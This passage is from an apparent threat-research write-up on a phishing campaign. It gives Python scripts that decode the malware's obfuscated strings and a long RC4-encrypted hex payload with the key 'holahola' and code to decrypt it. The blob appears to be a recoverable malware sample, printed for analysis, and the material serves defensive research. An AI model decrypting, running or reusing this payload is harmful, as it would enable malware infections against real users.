RBRDQDQKQIMCPJRHQJRCPJJINKOENIQEQIQKRBOHPKRCRCQEQJQJMBPKRGQKRBPKJHOAODMJREQEQGPKNJRFQHPIPKRCMBPKRGQKRBPKJHOAODOBQGPHRDQBQJRCQHNFPJMCPJRHQJRCPJJINEQIPGQCPKOEREPIODRJRCREPKQIMBPKRGQKRBPKJHNFQHPHQBQAODRFPHOERIRDRDQAQHNJPGQFQJRCOGQARBRDQDQKQIMCPJRHQJRCPJJINEQIPGQCPKOEREPIODRJRCREPKQINIQEQIQKRBOHPKRCRCQEQJQJMBPKRGQKRBPKJHNDPJQENDPHQIPKQGQAMIRFQAQBPKRCPALFLFPDMBPKRGQKRBPKJHOBQJRDRDOBRBQKPIQARCRDNEQJQDREOCQKREREQDQJPKMCPJRHQJRCPJJIOEQHRCNBRHRAPGQJRCQEQJQJMIQERDQIPGRAMBPIRIREPKJIOEQHRCNBRHRAPGQJRCQEQJQJMIQERDQIPGRAMIQERDRDPALDLDLKPCMCPJRHQJRCPJJIODQARCRDQDQKQINFPJ', 'SHRJMJBJGJFHJJBJSJFHIJEJDJSJEJTJS', 'WHHIJIBILHVGXIKIGHTHUILIKGVHUIFIGIKIQ', 'ZHJHCHQHLHDHJFHFFFCHBHKHJ', 'XHMHYIAHV', 'YGSHIHWHQHNHRHFHXHJGNHWHSHHHIHXHW', 'UIOIGIUIJISIK', 'VIDIVIOIQID', 'TJGJLIRJDJEGEIRJDJE','XGEHNHOICHPIDIEGRHQGHHYIEIDIJGTHYHTHXIF','[GHHAHSGYGDGZFYGYGVGXGZHJHL', 'ZGCHKG[HEHDFVG[HQHD', 'NKMMDNGLOKIMAKCMHLLMBMA']

def decryptString(encString):
    decString = ''
    key = ord(encString[0])
    itr = 1
    for x in range(1,len(encString) - 1, 2):
        val1 = ord(encString[x]) - 65
        val2 = ord(encString[x + 1]) - 65
        decString += chr((val1 * (key - 63) + val2 - key) - (itr % 2))
        itr += 1
    print(f'{decString}\n')
    
for string in strings:
    decryptString(string)

Appendix 2 – HolaHola RC4 Decryption Script

data = "1105EA690127CD7D2225B9D2DE8EBAEB1FAB2E81D87F3A83D8610FC7D03279B2BE41C3443F24823822ABF523F108B19212748D73CBE006C2493CF36670B6501F2C662ED961F39BBD4DC4B451810F99D9680C2C22448F69DF22C06BB2DD2BDB64A5E4CDF45005AB29BF115F18B73474AC12D5370B64C82233EFB185FAC0C4E2B460F79129D334B92D4D3332AAD38C932781BD00853DDCB13AE4578734BE7E4765784098C86DBC4DA175A6471CC47DC251601F6E762752FC84745B3C7EA26E57CBC1CAAD4EE1E59F59BCF0134964B80329E65A48FEAFF44E2F12E09B4172D2D5D960F0CA8EE0FEC53EC919BA0E244D45F5B9818C9A0E09CF34518898448792627B7C5E4F817E0D68758A0CFAD5A14DAC93C74EAD40AAC20569F557B0809E4CBD7770276F6FEDD051F7D494ADC37A2E2ED8A378BFD04FE2F6A0CCF424F2AA7F55B3B9802A18EE60C5396A5858F71D458EFCD5FB0C1E8FDA3B8345A2F79C25F6C4EFFA5139903F69AFBCB032D61D5F2EBDDBC3482E949F44A05B3CDCDE78D0D9BCCA7D801F4C20A62BB77B4E10DA52AA502B4EFBA0D4C47490E111C47C72B8B808A4B9E754F72B26A9349F7AD037DE2850F926EDD8F4A215EDA2A8545A6A648FF10F20505238C8F6A3A3FBBA7C6A2538213FDF7802E647EA16DB728E76F0C3F643FC4F6A8B2C66EC151F72CBB5C44FEB3FB47CF603B520DC3D15C6241CDFB66C7E6885BF7E39BA135A24D5B9012433275BE6C5AA8BFD827BB7407B5F6456D89C2905778B8373F25595D22023A7F0357EA511E7834953220B8062C2A58BFDF6A78ED94E357527BDA3B1B6691F3A282043407D9FC369407A50B80DDFB7BF4BC2128ECF5567B98FCA0806A9E4CD4AD424786C4D4D682EC75AE0BCD90A70B7BF748629678F70BE071F1759142D157C2D90C8B551C9E6218EDC448521980D4465FDCCCDBF04FB47C00EEC34AB88CB17D2BC2FB3B57130123DFF077E56D33EA31531E3582FCEA7F87E8C2709BE1ECBF3A0F6B18F9D6E582D19EFDE8FC155B28F1DA4F33E3A288A95D129CFAECC0554C7B87C85D85C3117AEE33DA3710CB031CB5966234A99A4A54E81585C6E0A0FEBECDA54A510F46F38FDCC0AF498D342804DC045232E29F3CE17E00745B46E86596C6DCA13A51C91857D5EEA0E717BB608E208613A63699D3869F256120ECB2F93B9D2CEA1660417D51177D3831814E7D50644EA85AE99792BA2D41B63DAF1B1CA719893902CE6338A87CE097EFA22C07EA0F6CD322D545D69FC5849D0E43807B181082E90E535AFB0519C054813493AA5A85180BBDE80AE7EF99208416EE8A87D436D9806B16545CC29E5B01119444B894CD066973A8EE82C757DA346D6068F61AB177866EA926244540D0CEA6DA4A438D61893F6731313E83C06BE5EC8BCA103F990013BFFC0D50C309D63B586FA4810FBFE49D5AD8145AF6C62C3334192E4565CA7A28743729E1914BE9BB5C95A225DB05547C1649A3D9B51687E97DD3CFD0551A2F4828D33C8336C2F6509256505CF8FEE34642A1039070AD95607CCF3C8E3D9B1E9612DADD0CDE396F0A07ECB96B96A5327F619E40006F363BC4FE31C220A51DB1B56B8D8F7C36220B58DF75EA1011AE78E352A6AB47BE5BBBECED2C4A87D552CDF288E7233B41C148F5964035EB140160D02A300FC256F1360DDCF7172255CDE52BA64E6930233BBB8352449B89FAD23010DF00AE458BE284804CEFC4591B228B2EEB6E572CEA847CF0D1D7C58E04038D0088CBF3E3A4A83F345CBC9E5C2CE106165602C2F0A51804DB4C01EBBB18907F1B04AF23A8868FEF3D0A0C096AF442D2E4A5233A1A6532CC9059915D567CFEFB7ABA26965FF88F9E77497E556C267EC4A159416DEEDC817D6D863958E4EA6EF4B5C5A8A10C26C0261553260B98EC203F23D01F5B0009B3B5A50A460E2A6579E23377950987BDF9B5C71E18790F3F24F994B0DA9C9756EE6427D833E0184932EB0AB509A9379B17EB90942C020B99088D2C899CDA5B4D232D93820928E970FC3D45911815E94542423A8534A29E20E86C230EBF65EAC8815CD4C71C69E57C41C8AF42CA136036AEBC137C6187ECE1CCA410A982BB16611EB9D1AB906C37862F0D4C9D20CEDA4E534B58B83026CD087A373BBEF5B20C5213800E11126A503682DEF80748A4F096465F78E8FC174F9CE053454EB383F1B4B3CA0578D59E0EDADCB3E8D09B966A1A61D67301390830E727FE6A86D616D99FE916C26AF22DB55CE32CC2E5985EF3543582CC9CFBABA3CE12F6BB9D5F68E03F6E476842A43DD4E5C08AEB27FCAAFA7BC4E6DF674F7A2E4F1636886D11DF4E0EA9BA640E090547B451A848AD9DBE2AC66407ED4012F31A0F99252E19518F9AF6676E7DDE8C9BB8F22EACB1E4B913FE205B00E9A92CD09CED615EB746480CE66A225AEADA699A724CDA37F417C9FA0DD38092D36030173935035EB848C79FDECDF26A11B9AEDBA894650F881AA1C93C8CC200F5DD41BAB74163B7087EF2FAFFE4A7D478047D4BC868FDF4DC9882CD37DD3B23C657B330CD890BAEE5DFE1F9167B44F9461CD0569B0A8B1445B373DBBCD37C85238C9EBA5F97134AD1D848B0A7E0A2770169EA8E5639F80F0C9F541AE886C9E847536ED404EE063D76A34C7ED181F4E0D5C7A1013711CBECC627959A094535792993C6EDA79862220FA67247D0C573D903104F1954F54DCA202F2EC9F1D9BCFFF19F2A9BED447C4089BD2A1065C1D6A016A37CD7F89AE55B8749031E52F3D0085316C55D4784AC8FFA308D593BE2600F38E42BEF249B448ADDD4A7B33519FBBBE54CE3A62AD4B8F027A75867E0D6078ED340DE35B4021A76E72FD2A450D0C7C90B2B52A521526FC22B5FC2033B84FC9563E2F4F7AB7AEA6F7802039CC555C0624E68BC72C16FA9735022D1848A68831ACDE3FAFFE6D1B8385743348BB758A9D31C1BB2419FDA281923CA78546E04C2571B0ED376F262A4F53D1E00E51F91DCAC84D17AF6FB243186E3197658426F817DE69158D4ECAB10C86CBA203447B05268972E49276D8FAA06D1BBA31CBA38679853D82D1AA9F03F53C06991DA6A5B9056604BC1FB788DFAC5BE2DE1E56D47BEF84EBE20938AE26F1ED09E0594020417015A2CE24AB7106F3FF79CB01FB7C3B91F63F23FE4C1C5175701710724A8ACE0EAB8458A67C05E1ADAD553A2BE14FAB1EF3C5CEC7AE63C0DF4A5A0020145AD2378F0E7CD60097F59843196BFFA16B0BDEF6D81B2DE6B8C56E8C3249AB8826AC6356E5CD0B93ED05DC8F037B5C657BE2DB30AF0B7034E171DBBFC1E0D303ACC19C57FC29743570FE34B2A369280F0E6269560F3A098776FDA95280D39FED839EEBADC43386CC39434DDC5D9B09925197AEE55B1CA97610DB1DCFDDF2ECC8545E6BAAA995F7AE2B714C90C19CCF5EEFB27858F96CDC01E27BC3058F3D31251D0D8F75F8A0661F8001F516F93C3860CB4B14A0FB2349D4856C720ABC049D3D72773BABA043AF4997E2F98278375E9EEC921B01BD88EFAE9C322805FAB23685AF1FEF69F66ACCF5D927941C3BF9F575796F9130BDD42123BA55490A548393EFE59BC6B93C04429EAA7BEAE5CCC790E6F1AC95D3C4DCE2737418CABE076AB967410B80F8610243754F2722EA7C13E450A6A33832AA5177B42333C87DC8952745AA85DC8E432BA418B5540F72F35AC3EF79AE0CFD06F7318C2CCACF7DEDF22F25FDE475BF407D6A7A8A7064EFE2AF6F6BDDABAB76F6545C9BF4B1767FA2078BBD6172DAB5E059E9F9EF21809E0DEAB513A61A0ED5F114FD63777A5974761FE17EF1753910558A482EC87E67CBD8B6CEF443FC403146746A5590709AF54A73BD8C9DE71E188D14B08DD676095A206C0045D112F4D41E3CE49A43F751CD847BA6AA603B22A98A110E8454AB2C54630DF52BC27A543D531119BB3C408A388B6C745A87233A6A0BBCEE7ED155A861056D003FC964480E59770EDD013B2DBA2EA1EACC8F560A9019805A11DC9FE627805BF37DF89F5E21DD8F1826A12F8091A842D807CB04CE65DE9DE3FD5302FD2DC6D0E3A3E89D93A4513C8E7DD842E222F35B455032E77178FD305841B53452DA31E4684D6646B786D45BECFF10DB090BA316B742B5CBBBF8F1A974CC1D3C215572D02C02CF7FF5279C155ED44C4F45F8B2A478F501EDF866DB33A429E0F120091779709E8254E95FBA0CB3DFFFB1AC7EDB82F0566742BF845E114ED20CEDAA43F0DDA3CEBF7F313E87F09882273DB5910B485655378576BF6D44A0790D4EC4401565484F41B066628ECF6930D39FCF7BF2A3FCF91DE80FA984F7F033A04170E2B115AA308AADC86C3A484B178524F83D2B124F3617365C932123C5BF60F79C0A9AB3F864BBC4AB6D869C3CA3FE7B59136E622BE10AD98291DA97217BB08941E24B0F5C11B0F464629FF274114060A4B3F92104FBC9A77FB4F4F9E47BA109CF49FED8F1A916D7CD2FC4811D1ABBB11FC182F25BE911B416FE9A4E4EA85A5977932AFFCBE3DE124CA6450FFF5653E90252D3B081EB371E5A8D70F2268C640A95233D5E94F519F3C287FD08ED25E6BC2D28C6629E002417DCC529A0417DB11C94CEA774F42991DF8B06921528F74D38F1FC535BE30603AB8D436AD3B96C598495902AED3671A35F39BD88C2FFAD4EFB721DFA705125AE92432D210BC69710C1FAF555F4DDFB6D37C5424048A6C3A08617231DCABE906471F92E2736D9C3F6498E80D23D71F932AE82A9D868CADC107C9C93E5D8EDFB2ABBE7233C9965DD5DEBB897BD84C5ECFC90CF71C3721D02D69DBEA31DC05D27E731F87005FDFE141E2D2C1B6072C7C5AFF239C47D7C2804FBFCABA6482AA7520F9FDB00B7C386BA6EED42375478C5AE2DB7A1ECEEE4DCDC556FD6B46E5A646BAC7D5C61B476DDD8BE84B7F191BD1432E3CBD7A4509BF93CD4208108843C679328DCB2759EE456A55C8B343E17B27CFFB67D25D66DC378AF8D9B9003A3072923C9CC5C905BF89D2DBF3B7D616164F6C3A9BA06C28F62A13AD53A5533B619B7345936137E77DFD80D12DBF6C60BB789B9BD662DBE5B9B52F37E6D415B857060F312899A32767EDC096CD22298954F6C6263746D1CD8C1D69FF50759ABEF38C5E7218CDD1980A1C9A0A108DB324D81ED398BB20C7350065746483443AFC98284F66F90F392BBB34BB6E1A40449605DF63D7EEEA0405C9994B87778BA668FB5EC03FDDFD8CF5ADC8C6FCB076DF16299D2D4A0BB68F2CF9B70F730BBCCD475B4B691F84F390CEFCC19A811244AA114C3999E5555757FD7DD276E82303B2F00B4202C8CFAED4CB926E93358E426CE4552A70A16AEE7B787BCE1203287C66E982F8098A48E9B5B7744F805187E1A48C043D3590FAC2755F49AFE9C055E67268A32347DAF74A64ADE7034F7D38D9CAF97CC086558C50F52D38820CBCA55D54803214D82E27054A3C9983C6190316EC24FD3733E2EB6A8FAB011F89BD4B0D3A94CBFD75DE637F049BBDC5D6623AFDE5A0D2774DB2515015A68951393E027431CCA1265AC2E6CDC1EDFD34D59AD9C0047DDD2D89DAACDF2916B00B90B9875FF8A1D72BBC493DFC6EF65225B5968A99F1833982EEB99F4BBAA3AE5BB6A9ABF38D9BD1F4B96573879CB8CF06339F92DE94DCFB86000E63094A96D70D3F82F9F4BC43F833B7C0DB0F73E7B43AD7B01C944939BA5639F86C7B2664C1655E4DC89A4E4E4976CF2DD5960DD5039EFBDE4D3CD17F84491E29BABF07946730F890C4962EF0A9FC1C65A586427B39413833A03BB615667E1E66E2CA474106F7CBC8B02BD063291DF1FF6713588E1DD3A2D5A6BAF73B28DA92A1C2F4F4D666CFA51B3F6BEE34C549F07A108A0D97A7A6395D08F471DC370905BF5EC85813F416A817872AD56065BD1070DA108920B9C7CB12443C12E264E1CFBF70DFF085F78E7B0D05694ED4C6A7231848E4A878E0FFFCA211A3FC61BD09E2AC116A574267F84B2199277351C3E97BACA1C2FB1EA413C484A34E6561C11A9BEB30C647BF0FCF5FDBF8654C61E4BF90786563707B6B686062C789798175CFA47BF03B51F3A8B12E90B1AC1E35C675BBCB622AD511224F5969699C5C39FA4AA5AA4815F94FBF48D13894D4ADD0112373403D30B3CB67D5E66D2F404ED90617A5ADB0A2BD27B3DFCBB9D2AA44F57606D843ADF6E8F5A1C47B34BA2DF1057088C3E57803B0321090506531107A4929326FFEAABA5A86D885E543E436365F2083AFE05B837D20CD1ED400915761892F0BD9A8B180BF91B8295EFBED5D5C8D81C127D4931A78B97EAE57B03A6DE3A0A016825A6791BB0D72D82DAC86B20D620B628AE626A614B7DE59175E45D2346E161AF1E3793ACF7B1F69727E2FAC6630274B898C6F08E99E7939A32A6C2866929A1A6C683BC0C9125BDCBFD6C73218847FF85DA9DBE15A831BE42075D85DD551392F18ECB614981C2EF4F04EA4FDF11511CFBFF212EF76BACC4DB0A97CD9507CC0DC9FF175DCE87A0D951B571BC30D27306407528EA51D04DA44670C5494B80EA48C5ED98BDFD25FCFAEB985A0A642F14C7588F70EAF2BEAC34643BAB9CF608635C7F1C3AFE34A59E40ACD3FCE4FF0D0F5A5427DE1842D6462D9941488521AF82984237BC0BB13BC52476A46D198DF276ED48F2E3BD50AB37586C14F5FF06E5AA448D4B85150BE4F939DEF01FCF84D1AA9C69E676CDF6D68D7C6F0AF176F7C5A193A7D0556A9491601C9DE3AA650C2D13AC03F87A5E42E33291E1F26F4423A782A076F3223ABD5A35887236BE69FA329EA4938A65510F3F47535D3E9F0ACC18D14F70194CC246A1FEB3DF76D5FF3C3841E45640C152A2E03B3FB76F69F10DA6D3E610C3E2D24F505412D82B942797836DA0F2CBC0A861D3E39E84F9FBF83081C46E919C7F01E2206DB137AAA498DAB2FC99440B2ABEF588AA710029F8372FAEAD30C7C66DA6B185E495B3BF35C95682B1CA8702126E23137D76E0DAF8ADDE32BF3B0451F1C94C6B2ED738F951FF89FDE96A694F4830D3622DD7EEB845DFB034F02A92855E4752EBBA5B2910F3DA2FA9B1E3B7C3098BD0128D157C976BAD0F08D34F8D7119E46D989AB5E289DAC86516E04D7B2275E897895D4DCEB3FDE6724E894C33E8201ABC91E14955DF59A44BE016EB4DC350EF587AA5D9C4F3E0EE5382667220FB3F35C7A8E6E51EA195A91CAAFA02460524DC87AEB61A21C8A3F11F975E56CA1FF83D9BEBB9A4C680E213B69846C44571B790C71904168A5AD3C643C67837A1E3DCE06CBC3829E78BF7C4D611B88C134C4196136B268ECFF011A8E1AD526CA5BC3FC5898579AB5C779D8F3DF4A9771C3EDC292741D8A36552D6D9C0B1A154B16D79AA4CC7D026EF00BD787A62533375C41CC0D90E608EAB86646965021D211E452C48452503326EC14CDBFCC4F30443173F664937F920ADD0C03CA50D38A5B0C7B05C8DF2F5D5FA99E1A761DA9FE10B3DCB44CC4F85C064830748BA0DA7396640581F9534B72DD92F49A826D939F43DB4548A0C30B8843C0F1D4D9C2FCE4A56CD6F238679A4835B4E0C13B216587A621183C9A66F5A12E472E4468DBB702C5A9AE4EADBD0EA1DB3C6CE0BCC9C33CA83464A7D363305EA7138CC9A1C430DAD5B5BCE754B98F891EFB71633CD203161A27EC27D25FAA1C880C2DEEA712B34F6C881420C1AD95B9E459585739B64DB8FEF24E938C6E28366E649B7E9AC2A635B5A5A86E25C03EF2E2FBEBAF5A2AAA0AF21839C434DAEC5C3FC192609A2E01364764B32EAE62A0FBCB616890B16CAD84016791DF13C8E5696D0E6F11D8053F15F5F1A11643AD9BA53BEC61DC63CE02B3224B4D658DECC9C01382D521162167687B26F9AEBE375274DD497E1D58A4E750AAE85CE76E487FA04050E732791F9C983B5CBCCF6EF119CAE78E1FB73CA117852E2B3A0322DB4AA7B19C3B8E360663D7B41DCA379F1985ACECE9A2F6C1BA0911748CBAF3CC98EE3985356BFB00504549B43282CE0BB2C86A706DFB4F92D17875FA903226095E17CFCB53DBD989F24891C35F51484A4259DE3AF1FAA7C90568F2FF4F35C0B276AD39550D7C06DDA7E9D555CEB5C56232BA9DF271A004AF2F7A7C304ABDB31BD029D28BD91B81926007ED8502AFE92EADC36F7404414875AF13CF4A2FDEAA92DB11C9FF850ACB798AD59D6A7EB07B4D40F8A03E9300540CCDBB54DC86E91E22201C7D85F182FA825DB53EC3A14A7089E56AC23B64495AC8E4E53068A7B2799ACE4C7100C51322BE145C3E6D23FFD159D2635AFA28683069A42C870119FBFF93FD6ADA29426C2F5DE8E7EAAA4DB0185812FBEF7E7068CA4BC5FA0C5D8B5353C1952F9EB340FCCC6BFCF054128CD56BAC7CE8D49D97DE32F66EFC28493147B72EBBD27215706C934B22FDFADDD104F293A0C5D37CF407133898F86264853A702F0798C4A10916E73747B86D897DD7CFBFEEF336D1AB70BE158FC645F3AE82037CE4D622E80F27AE438E86A4B33351800E596243131D6CE26F648524400643715C8C59F59389D7AA89B5519A1EEE64CAD4E5AA73DD1AF7209A91F88748ABAD5E7C51D48BF339EF15642F6CB43790F7D3776EA1AB184470D9D28DDB429E73DC46C5227C9F6AA7A6B273F263D8A7B7645ECCABE4347F8A8BB8C822708C674447E390E2CCA1E2C776810AD4496B45803FC153046FE59DA5E1D5F37C4D5A362022FED50147370E6CE66C153E7D0FA6C4EE4085F238B966AB3CD04D1ED651B7CE2399075E0E5585DF6204CD89F3C9AF97B26BF1F5B6409CF0BAC7D1A6EF797D198003736D0A3AC8B3516C2FF0EC4E2D5F02BF1F7A547D5189048AD0C191B5FD19DF76FBF5F11C812829AFC8C2628371957698813FB9CFFE5DE0B6FBE4ADA8B18BBA7803EBBC617DB3A3515E8F04FD8E0E0D7C8928D6849DACA8DD721E817CD6A4B15E710D769C6407F1C256EC535D90AE0B1D34C4D633061436C07028EE6A17FCDDD9EC185E1187A675716538044571A3F6AFC7753F920238239663A5E8F436183177603087BC19C721247739265E4230786FCFB4556F3725D61600394EF656B179CEE4DF29EC0F3D5AA8683E2D9D2FAAF9B7DEB0E5D9C25EB526956715F4CAE3FBFBA61E8C00F309B31F4D33E4E15F18D6FC6F0369002EC65E771C541F759AFC35DAF6707241EC401DFEBEBB84F86C3559D5F0D6865F3BE060A16960D7D42A5720B17A640B352861B9CFF4F4D8BCF451AAE4587CFA281D8368CCD2ED862EE5D1F0BB477A5B343A0414498AB8DCAB891992A8C42D63493AEE84E16EE0A01AB0C7446791C58C43A2E7ACD1B6B3736BDE5F8C0D89C93AC1CB946F3DF4B16CB6B48846EEAFA06733D3C9BB4D05E1C41F6C7E2B95D7BD13E37C91CBA6474875BF65030137E842D1EAEA86C22137A862C19E84CEB9D8736633E5FAF042B9470CFB6B5AB4E1E83D95716D43A3CEF528F80FCA61361726D69806CBD33F16DFF19FAB485C38143E1B740172FC420DD78CAEF1EC696E31739077F09123ED584F93FF738FC47D6A4ED0C4B2A6BB6AFB57FFC839C47E5D05405DB851EEFF2AECBFB277D2C5801AAABC5FEAF31C57B061A0091762DED9000A39B5AA65A9BEACDC471CD39380FFD106EEED1665A58CE59B3159CB7FEA901C0CC0DAA90FD1F4F06D68DB7328461E9231CAF9D6660EBA205F7870DA232F51A1430E5B80E1419A17EF56D9442F036A3F730AD3601FA1A545694BEDA62B82030C292DF6C40310FF2A5F169B58CD1C5913C616F266129F0FB349A39508F855A31798D2D5B3F747D916078DDD85C96A7ED056A2AA589C425D20AF312C068927FE73F41DD38B717EDACD8DE78468CDA78096428F653E90901606B12500D8B1301B5A8B7839DBB8732C48A6BBDDD69FD856F786DB73B33EABBDECDB6E3026C9B932DB847A07710A0100A597FD8ED20785F69E87EEE6D9C73AD42EA7725334923B9A42D04E783BFD95B788E84FFDBEFC0AFCE12C6120784E8D8B6C1A4D9F462CFC2CDE400F922ED229359FE79A7BD3668A2D9278D928AB019A5BD692044BC17795BAF3BE148B728537A7E97D1991D38CDC185734EEB6D743368C4FC41964C1DB8FFAC5DBF3846EA8C74B7B2EE18408DD59A9F03246CBD8CBA7F728B065428F87062D1B5A13C03045E763C4364C269DBB01F2A9817509F99CA0F565F06641E566C19DF2A2E03628C8D20A8DDC1F488016A19EEEB5632A4526E0591B0B0E28B52EA49521EAFF3FC358012CF1DF502E6F3E55B3F426E06DE4A925DE4D9C63EB7FE0AB0C5DCBCBAAF5550D7EDEBBD10B9F5DB4374CEB5489321285D5E3355CF9DACAF9E81169AF47BED6B6612D5C59F37929AE5AF5F2FEE57C8342DE0082F5AE3AF25D9FC01B7108B9116BB11DC623E2532CA8E3F8D4793993CA2F273796AC7813866574A09C65E6BF4A9CB8FD83E8FF0CF6AF8831248B0F1A728DC230F18ACC15190160F214A0D870A9BB94F29AD3C57404384997454AA08A747A89DB56F1B2DD28D2F3E2D6EF7BF5A2B5928F29D0922ED911B45E5D387B926ECD5D0817B7E86E98FABF0CCCB2BA0BD855391D37B9DBD26C4FEFED88F4883299B6BF4FE0BE7921A3D0FD40F812372911523FCF232D4E350837903C263D18F66660EE90E807EF933C1C5CE7757949CAA8AFC89A707A7F4864A726491B94B71B4B4291FB2CFB808B7C0A561966DCBD77C2418BB3D8CF1A261EED91EFE705D389A74D37A6C3802BB08690DDA6241DDB69EFF660D8CE76AEEB3C04D1C73A10D367B752332799FFC9B56F53991459D5D1BE996DFB8AEE6CE7A406249414546F7256B8BBB34EA9D1948F3C88027FBB3B6E68C7C2CB67BFDEF312157F582765BC07F842C03FC09248C47C80E0A1F611FF088EF42916072953151A6C4712FE2ADE59BA40592DA3204601E900C51645BA65FBBBDEE34353E9E64E7AED7119797D157BC9FA60064247E90415E9E2D65B6BD2B831CFE27A2551FCBA655106C8C260FC80A4639016042332DCC0A79F5952CD925E0DE2798A55E0D533ABECB4E84D2B2AD183E6D5949501FD5508DBFD5DDEB66FAAB2FA162ADD1E7DE8A6C6EBD2B6745E638A13D7D53E7EEF90A6CD8BAA46A2926B2EC7C042BFA212824165E3B245DC62D803256FE9FD5C1845D65191F6E4C0C6A948519DF4A"

arc4 = arc4.ARC4(b'holahola')
plainCode = arc4.decrypt(bytes.fromhex(data))

print(plainCode)

Thank you to Igal Lytzki, Perception Point Threat Analyst & IR Team Lead, @Merlax, and others for their research on subject.

To learn more about how you can protect your organization against phishing attacks like this, download the Advanced Email Security datasheet or contact us.

SOC team overloaded? Get a free, fully managed, 24x7 Incident Response service, and save up to 75% of your SOC resources. Learn more.